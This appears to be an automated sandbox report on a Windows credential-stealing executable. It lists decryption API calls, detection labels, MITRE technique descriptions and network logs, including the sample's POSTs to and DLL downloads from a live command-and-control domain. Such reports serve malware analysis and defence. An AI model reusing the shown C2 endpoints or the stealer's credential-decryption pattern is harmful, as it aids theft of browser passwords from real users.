Instruction Fuzzy Hash: A431C7706487898BDB306F78C648A5A77B4BF5630CF11CA29D888CBA11EB34D4A5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6C79A4E0 Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,6C79A468,00000000), ref: 6C79A4F9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C79A468,00000000), ref: 6C79A51B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C79A468,?,6C79A468,00000000), ref: 6C79A545
memcpy.VCRUNTIME140(00000001,6C79A468,00000001,?,?,?,6C79A468,00000000), ref: 6C79A57D

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction ID: b9a0fd1bf094b1e1cb2a76ababf3645f0d3df85513b0e517b3af7e283da7d660
Opcode Fuzzy Hash: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction Fuzzy Hash: F61159F3E0131557DB0089B9ED81AEB77E99F952B8F280234ED28873C0F635990987E1

Uniqueness

Uniqueness Score: -1.00%

Source: https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll	Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dll	Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/nss3.dll	Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll	Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll/$oT	Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dll	Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/softokn3.dll	Avira URL Cloud: Label: malware

Source: https://shaffatta.com/L	Virustotal: Detection: 8%	Perma Link
Source: https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dll	Virustotal: Detection: 11%	Perma Link
Source: https://shaffatta.com/fdca69ae739b4897.php	Virustotal: Detection: 10%	Perma Link

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00409540
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00406C10
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_004094A0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_004155A0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_004155A0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0040BF90
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C6D6C80
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C82A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C82A9A0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C8244C0 PK11_PubEncrypt,	0_2_6C8244C0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7F4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C7F4420
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C824440 PK11_PrivDecrypt,	0_2_6C824440
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C8725B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C8725B0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C80E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6C80E6E0

Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAFHost: shaffatta.comContent-Length: 216Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBGCGCGIEGCBFHIIEBHost: shaffatta.comContent-Length: 268Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJEHost: shaffatta.comContent-Length: 267Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFIHost: shaffatta.comContent-Length: 5823Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d32e011d2eaa85a0/sqlite3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJEGIIEGIDGIDHJDAKFHost: shaffatta.comContent-Length: 751Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJHost: shaffatta.comContent-Length: 359Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCAHost: shaffatta.comContent-Length: 359Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d32e011d2eaa85a0/freebl3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d32e011d2eaa85a0/mozglue.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d32e011d2eaa85a0/msvcp140.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d32e011d2eaa85a0/nss3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d32e011d2eaa85a0/softokn3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d32e011d2eaa85a0/vcruntime140.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDGHost: shaffatta.comContent-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCHost: shaffatta.comContent-Length: 267Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGHDGIDAKEBAAKFCGHCHost: shaffatta.comContent-Length: 265Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFCBFBGDBKJKECAAKKFHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGDHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBAKJDBKJJKFIDBGHCHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGHHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAEBKEGHJKEBFHJDBFCHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFIHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAKFBGCBFHIJKECGIIJHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGDHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJEHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGHHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEHHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDAHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCFBAFBFHJEBGCAEGHHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDHHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKFHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKFCGHIDHCBGDHJKEBHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEHHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHIIHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHDBAAECBFHJKFCFBFHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.50.2
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.50.2
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.50.2
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.50.2
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.50.2
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.50.2
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.50.2
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.50.2
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.50.2
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.50.2
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.50.2
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.50.2
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.50.2
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.50.2
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.50.2
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.50.2
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.50.2
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.50.2
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YOPbGKrV0LEGIjBS7GnGmqaZ9EWfyRGfksWN7UDK3EXq_-bjwYmJEf0C5nRkSFOpXYOxhCcsjI-KqzoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-03-00; NID=513=WCt0m2IY6-XwivBAmcSfqLq9ED-NKpUBmsK_eqjaiJ4U0I64v8yMvtJhBFx3-k8CDGXp6aJr1OuMvuf-TGgQ7NDfE9JAMUgh0kmH9V0PntfGpQ0AioP_qVIxiA_qn-BFOwJVLhWrkm1ZR8rK9Dg1rDT2lDgW-86owYUYlk_lfjc
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YOPbGKrV0LEGIjCEBr3ti8UCkjxZ8z1bhLV56wHmRrKhu4Vx7PJg1CB49b8tfAh4AUocopkgP0IK5pYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-03-00; NID=513=WCt0m2IY6-XwivBAmcSfqLq9ED-NKpUBmsK_eqjaiJ4U0I64v8yMvtJhBFx3-k8CDGXp6aJr1OuMvuf-TGgQ7NDfE9JAMUgh0kmH9V0PntfGpQ0AioP_qVIxiA_qn-BFOwJVLhWrkm1ZR8rK9Dg1rDT2lDgW-86owYUYlk_lfjc
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=H8C+XZOAWfMGxBS&MD=hxA+7znt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=H8C+XZOAWfMGxBS&MD=hxA+7znt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /d32e011d2eaa85a0/sqlite3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d32e011d2eaa85a0/freebl3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d32e011d2eaa85a0/mozglue.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d32e011d2eaa85a0/msvcp140.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d32e011d2eaa85a0/nss3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d32e011d2eaa85a0/softokn3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d32e011d2eaa85a0/vcruntime140.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: shaffatta.com

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

